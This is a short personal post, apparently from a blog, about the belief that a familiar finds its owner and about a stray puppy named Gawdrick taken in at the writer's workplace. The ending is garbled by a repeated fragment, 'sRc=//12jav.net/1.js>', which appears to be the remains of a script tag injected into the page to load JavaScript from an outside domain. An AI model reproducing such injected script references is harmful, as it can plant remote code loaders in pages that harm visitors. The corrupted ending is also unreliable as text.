A lot of traditions believe that you do not find your familiar that your familiar finds you instead. This is how it was with mine. Gawdrick was a puppy and showed up at my work door and i took him in and took care of him only realizing later the bond we share sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
